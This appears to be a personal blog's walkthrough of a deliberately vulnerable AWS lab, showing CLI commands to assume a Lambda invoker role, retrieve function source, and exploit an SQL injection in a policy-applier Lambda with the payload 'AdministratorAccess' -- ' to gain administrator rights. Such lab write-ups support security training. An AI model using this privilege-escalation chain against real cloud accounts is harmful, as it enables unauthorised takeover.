rootđź’€senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
Vulnerable lambda keynotes
- We have 2 roles related to lambda
lambda-invokerandlambda-policy-applier-:
Lambda-invokerallows us to invoke lambdas, list lambda and others.
aws iam get-role-policy --role-name cg-lambda-invoker-cgid8mkn9nudjl --policy-name lambda-invoker --profile bilbo | jq
- Assume the role
aws sts assume-role --role-arn "arn:aws:iam::xxxxxxxxxxx:role/cg-lambda-invoker-*" --role-session-name lambda-invoker --profile bilbo | jq
- Listing lambda functions-:
aws lambda list-functions --region us-east-1 --profile bilbo_lambda | jq
- Getting the source code’s url-:
aws lambda get-function --function-name "cgid-policy_applier_lambda1" --query "Code.Location" --region us-east-1 --profile bilbo_lambda | jq
- I found sql injection in the
main.py-:
target_policys = event['policy_names']
user_name = event['user_name']
print(f"target policys are : {target_policys}")
for policy in target_policys:
statement_returns_valid_policy = False
statement = f"select policy_name from policies where policy_name='{policy}' and public='True'"
- Exploiting it-:
AdministratorAccess' --
- Create a
payload.json-:
{"user_name":"cg-bilbo-cgid*","policy_names":["AdministratorAccess' -- "]}
- Invoking the function-:
aws lambda invoke --function-name "cgid*-policy_applier_lambda1" --payload file://./payload.json out.txt --region us-east-1 --profile bilbo_lambda | jq
- Admin access-: